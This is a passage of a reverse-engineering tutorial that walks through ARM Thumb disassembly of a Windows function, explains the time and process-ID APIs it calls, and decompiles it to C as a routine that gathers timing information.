50: 00 9B         LDR      R3, [SP,#0x1C+var_1C]
51: 32 19         ADDS     R2, R6, R4
52: 33 51         STR      R3, [R6,R4]
53: 01 9B         LDR      R3, [SP,#0x1C+var_18]
54: 08 34         ADDS     R4, #8
55: 53 60         STR      R3, [R2,#4]

56:      loc_10107C0
57: 20 46         MOV      R0, R4
58: 04 B0         ADD      SP, SP, #0x10
59: 37 F0 A4 F9   BL              __security_pop_cookie
60: BD E8 70 88   POP.W    {R4–R6,R11,PC}
61:             ; End of function mystery10

Although the function looks complicated at first, we notice it does not contain any kind of loops and only executes sequentially with a couple of conditionals.

Presumably, the security cookie push and pop operations are responsible for inserting and removing a stack cookie, which will protect the function from memory corruption vulnerabilities that aim at overwriting the function's return address [msdn]. 

mystery10 also invokes the following built-in Windows routines:

GetSystemTime [msdn]: 
GetSystemTime "retrieves the current system date and time. The system time is expressed in Coordinated Universal Time (UTC)."
Its function prototype is as follows:

void WINAPI GetSystemTime(
  _Out_ LPSYSTEMTIME lpSystemTime
);

It takes one parameter, which is a pointer to memory where the corresponding SYSTEMTIME structure will be stored. As we can see from the definition, all struct field are of type WORD, which means they are 16-bit unsigned integers. For our purposes, having the relative offsets of its members facilitates decompiling the function:

kd> dt _systemtime
uxtheme!_SYSTEMTIME
   +0x000 wYear            : Uint2B
   +0x002 wMonth           : Uint2B
   +0x004 wDayOfWeek       : Uint2B
   +0x006 wDay             : Uint2B
   +0x008 wHour            : Uint2B
   +0x00a wMinute          : Uint2B
   +0x00c wSecond          : Uint2B
   +0x00e wMilliseconds    : Uint2B

The pointer passed to the function as an argument is contained in register R0, which in turn contains the stack pointer (line 12). Thus, the SYSTEMTIME structure will be saved to the current stack location. 

GetCurrentProcessId [msdn]
The Windows routine GetCurrentProcessId "retrieves the process identifier of the calling process.". 
Its function prototype is as follows:

DWORD WINAPI GetCurrentProcessId(void);

It takes no parameter and returns an unsigned 32-bit integer value.

GetTickCount [msdn]:
The Windows routine GetTickCount "retrieves the number of milliseconds that have elapsed since the system was started, up to 49.7 days."
Its function prototype is:

DWORD WINAPI GetTickCount(void);

It takes no parameter and returns an unsigned 32-bit integer value.

QueryPerformanceCounter [msdn]:
The Windows routine QueryPerformanceCounter "retrieves the current value of the performance counter, which is a high resolution (<1us) time stamp that can be used for time-interval measurements."
Its function prototype is:

BOOL WINAPI QueryPerformanceCounter(
  _Out_ LARGE_INTEGER *lpPerformanceCount
);

It takes one parameter, which is a pointer to a _LARGE_INTEGER variable, which represents a 64-bit signed integer value.

After having discussed the different invoked Windows routines, we have a look at the characteristics of the function mystery10 again.
The disassembly is executed in Thumb mode, as we can infer from the 16-bit instructions and the typical PUSH.W / POP.W instructions.

As far as the instructions are concerned, there is an interesting branch instruction named BCC. BCC stands for Branch Carry Clear and accordingly will perform a branch to the destination when the Carry flag is not set, i.e. CF == 0. Note that the carry flag is only set when an arithmetic operation between two unsigned values overflows. 

mystery10 apparently takes three arguments in R0, R1 and R2. Although only the values in R1 and R2 are read (lines 6 und 9 respectively), there has to be a third parameter as otherwise the previously mentioned values would be stored in R0 and R1. 
The second argument in R1 seems to be a 32-bit unsigned integer, as it is used in CMP instructions (e.g. lines 8 and 26) followed by a BCC instruction. As already mentioned, BCC instructions check the Carry flag, which is set only when an arithmetic operation of unsigned values overflows.
R2 contains a pointer to an unknown memory structure. 

The return value of mystery10 is an unsigned 32 bit integer since it is initialized to 0 (line 7) and only addition operations are performed on it (e.g. lines 16, 32 and 41). 

Our provisional function prototype is as follows:

uint32 mystery10 (void* arg1, uint32 arg2, unknownStruct* arg3) ;

From the function's control flow, we can see that the size of arg2 determines whether the Windows routines are called or not. It is repeatedly compared to R4, which is initialized with 0 and increased for every called Windows routine. Rather than translating the disassembly directly to pseudocode / C, we examine the different input ranges of arg2 that trigger the invocation of Windows routines:

[0;3]: No routine called
[4;7]: GetCurrentProcessId,
[8;15]:GetCurrentProcessId, GetTickCount
[16-19]: GetSystemTime
[20-23]: GetSystemTime, GetCurrentProcessId
[24-31]: GetSystemTime, GetCurrentProcessId, GetTickCount
[32-[: GetSystemTime, GetCurrentProcessId, GetTickCount, QueryPerformanceCounter 

For each called Windows routine, its result value is written to the third argument arg3. Moreover, the number of bytes written to arg2 is added to the current value of R4, which is finally returned by the function (line 57).

We are now ready to create a first draft of mystery10 in C:

uint32 mystery10 (void* r0, uint32 arg2, unknownStruct* arg3) {
uint32 returnValue = 0; //line 7
if (checkValue > 15) { //line 8
SYSTEMTIME currentTime;
GetSystemTime(currentTime);
memcpy(arg3,&currentTime,sizeof(SYSTEMTIME)); // lines 17 - 23
returnValue = 16; // line 16
}
if (arg2 - returnValue > 3) {
uint32 processId = GetCurrentProcessId(); // lines 28-30
*(arg3 + returnValue) = processId; // line 31
returnValue += 4;
}
if (arg2 - returnValue > 3) {
uint32 tickCount = GetTickCount(); // lines 37-39
*(arg3 + returnValue) = tickCount; // line 40
returnValue += 4; // line 41
}

if (arg2 - returnValue > 7) {
_LARGE_INTEGER  perfCount = QueryPerformanceCounter();
*(arg3 + returnValue) = perfCount->HighPart; // line 52
*(arg3 + returnValue + 4) = perfCount->LowPart; // line 55
returnValue += 8; // line 54
}
return returnValue;
}

Effectively, the function returns the overall number of bytes written to the structure passed in arg3. The second argument arg2 can be considered a limit, up to which it is allowed to write bytes to arg3. Hence, it probably describes the size of the memory structure pointed to by arg3.

Finally, we provide a function with more descriptive names:

uint32 retrieveTimeInfo (void* r0, uint32 size, unknownStruct* dest) {
uint32 bytesWritten = 0; //line 7
if (checkValue > 15) { //line 8
SYSTEMTIME currentTime;
GetSystemTime(currentTime);
memcpy(dest,&currentTime,sizeof(SYSTEMTIME)); // lines 17 - 23
bytesWritten = 16; // line 16
}
if (size - bytesWritten > 3) {
uint32 processId = GetCurrentProcessId(); // lines 28-30
*(dest + bytesWritten) = processId; // line 31
bytesWritten += 4;
}
if (size - bytesWritten > 3) {
uint32 tickCount = GetTickCount(); // lines 37-39
*(dest + bytesWritten) = tickCount; // line 40
bytesWritten += 4; // line 41
}

if (size - bytesWritten > 7) {
_LARGE_INTEGER  perfCount = QueryPerformanceCounter();
*(dest + bytesWritten) = perfCount->HighPart; // line 52
*(dest + bytesWritten + 4) = perfCount->LowPart; // line 55
bytesWritten += 8; // line 54
}
return bytesWritten;
}